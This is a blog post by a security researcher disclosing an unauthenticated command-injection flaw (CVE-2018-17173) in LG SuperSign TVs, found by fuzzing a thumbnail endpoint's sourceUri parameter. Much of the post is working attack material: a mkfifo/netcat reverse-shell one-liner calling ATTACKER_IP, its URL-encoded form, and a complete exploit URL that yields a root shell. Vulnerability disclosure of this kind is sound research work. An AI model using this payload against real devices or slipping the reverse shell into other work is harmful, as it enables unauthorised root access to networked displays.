miércoles, 19 de septiembre de 2018

LG SuperSign RCE! (to the 'luna' and back to shell)


Publishing the previous vulnerabilities in LG SuperSign TVs left me a bad taste in my mouth. Something like "I know that there must be something more".  So, I continued with my research and finally found the precious RCE.

This vulnerability has been addressed with the following CVE-2018-17173

The vuln


Playing with the app through burp I saw a url with some parameters. These URL is requested when the application needs to load the thumbnails of the images the user has uploaded.



So, I started to fuzz these parameters with ZAP until I found something interesting:



The application responded with the help screen of some utility called luna-send when the parameter sourceUri received the values "' or 1 --'". It looked like it was triggering a command that was calling this utility but failling due to an unexpected parameter. Cleaning a little bit the input I found that with the value ' -' it was enough to receive this response. I knew I was close.

If you see something like that in the response you immediately start to play with things like ;command, ;command;, etc, etc. After some failed attemps I tried with ' -;reboot;' and I saw how the TV was rebooting...the RCE was knocking on my door.

Getting a Shell

Taking advantage of the LFI, I knew that the TV had a netcat but was the netcat version  that doesn't support the -e option (downloading the binary), so I used the alternative:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f


Encoded all to be passed in the URL


rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E


%261%7Cnc%20ATTACKER_IP%20PORT%20%3E%2Ftmp%2Ff








So, the payload was ready:






' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i


%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE_PORT%20%3E%2Ftmp%2Ff;'








Putting it all together:








http://LG_SuperSign_IP:9080/qsr_server/device/getThumbnail?sourceUri=


%27%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2F


bin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE__PORT


%20%3E%2Ftmp%2Ff;%27&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&


targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150








I launched netcat to catch the shell, made the request and...












 




I was in.








In a few days I'll be updating this post with more technical details. 


That is all for now.








Points to take into account:




-No need to be authenticated


-No need to privilege escalation (app is running as root)




















Publicado por



en





38 comentarios:
  










































        

      









Suscribirse a:
Entradas (Atom)